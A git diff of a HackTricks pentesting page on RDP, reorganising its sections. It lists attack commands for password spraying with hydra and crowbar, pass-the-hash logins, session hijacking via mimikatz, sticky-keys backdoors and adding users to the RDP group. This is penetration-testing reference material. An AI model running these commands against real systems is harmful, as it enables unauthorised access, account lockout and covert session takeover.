GitBook: [#3538] No subject
This commit is contained in:
parent
c1b2a6c6b6
commit
46d9b8a548
|
@ -4,15 +4,11 @@
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -27,28 +23,9 @@ PORT STATE SERVICE
|
|||
3389/tcp open ms-wbt-server
|
||||
```
|
||||
|
||||
## Connect with known credentials/hash
|
||||
## Enumeration
|
||||
|
||||
```bash
|
||||
rdesktop -u <username> <IP>
|
||||
rdesktop -d <domain> -u <username> -p <password> <IP>
|
||||
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
|
||||
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>
|
||||
```
|
||||
|
||||
### [Brute force](../generic-methodologies-and-resources/brute-force.md#rdp)
|
||||
|
||||
**Be careful, you could lock accounts**
|
||||
|
||||
## Check known credentials against RDP services
|
||||
|
||||
rdp\_check.py from impacket let you check if some credentials are valid for a RDP service:
|
||||
|
||||
```bash
|
||||
rdp_check <domain>/<name>:<password>@<IP>
|
||||
```
|
||||
|
||||
## Nmap scripts
|
||||
### Automatic
|
||||
|
||||
```bash
|
||||
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
|
||||
|
@ -56,21 +33,43 @@ nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 338
|
|||
|
||||
It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).
|
||||
|
||||
## Post-Exploitation
|
||||
### [Brute force](../generic-methodologies-and-resources/brute-force.md#rdp)
|
||||
|
||||
{% embed url="https://github.com/JoelGMSec/AutoRDPwn" %}
|
||||
**Be careful, you could lock accounts**
|
||||
|
||||
### Launch CMD with other cretentials so they are used in the network
|
||||
### **Password Spraying**
|
||||
|
||||
You can launch a new cmd to wich new credentials will be attached so, every interaction this new shell makes with the network will use the new credentials:
|
||||
**Be careful, you could lock accounts**
|
||||
|
||||
```bash
|
||||
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" #The password will be prompted
|
||||
# https://github.com/galkan/crowbar
|
||||
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
|
||||
# hydra
|
||||
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
|
||||
```
|
||||
|
||||
## Session stealing
|
||||
### Connect with known credentials/hash
|
||||
|
||||
With Administrator rights you can access any opened RDP session by any user without need to know the password of the owner.
|
||||
```bash
|
||||
rdesktop -u <username> <IP>
|
||||
rdesktop -d <domain> -u <username> -p <password> <IP>
|
||||
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
|
||||
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
|
||||
```
|
||||
|
||||
### Check known credentials against RDP services
|
||||
|
||||
rdp\_check.py from impacket let you check if some credentials are valid for a RDP service:
|
||||
|
||||
```bash
|
||||
rdp_check <domain>/<name>:<password>@<IP>
|
||||
```
|
||||
|
||||
## **Attacks**
|
||||
|
||||
### Session stealing
|
||||
|
||||
With **SYSTEM permissions** you can access any **opened RDP session by any user** without need to know the password of the owner.
|
||||
|
||||
**Get openned sessions:**
|
||||
|
||||
|
@ -99,24 +98,32 @@ ts::sessions #Get sessions
|
|||
ts::remote /id:2 #Connect to the session
|
||||
```
|
||||
|
||||
#### Sticky-keys & Utilman
|
||||
### Sticky-keys & Utilman
|
||||
|
||||
Combining this technique with **stickykeys** or **utilman you will be able to access a administrative CMD and any RDP session anytime**
|
||||
|
||||
You can search RDPs that have been backdoored with one of these techniques already with: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
|
||||
|
||||
#### With Cobalt Strike
|
||||
### RDP Process Injection
|
||||
|
||||
If someone from a different domain or with **better privileges login via RDP** to the PC where **you are an Admin**, you can **inject** your beacon in his **RDP session process** and act as him:
|
||||
|
||||
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
|
||||
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Adding User to RDP group
|
||||
### Adding User to RDP group
|
||||
|
||||
```bash
|
||||
net localgroup "Remote Desktop Users" UserLoginName /add
|
||||
```
|
||||
|
||||
## Shadow Attack
|
||||
|
||||
**AutoRDPwn** is a post-exploitation framework created in Powershell, designed primarily to automate the **Shadow** attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to **view his victim's desktop without his consent**, and even control it on demand, using tools native to the operating system itself.
|
||||
|
||||
{% embed url="https://github.com/JoelGMSec/AutoRDPwn" %}
|
||||
|
||||
## HackTricks Automatic Commands
|
||||
|
||||
```
|
||||
|
@ -142,14 +149,10 @@ Entry_2:
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Reference in New Issue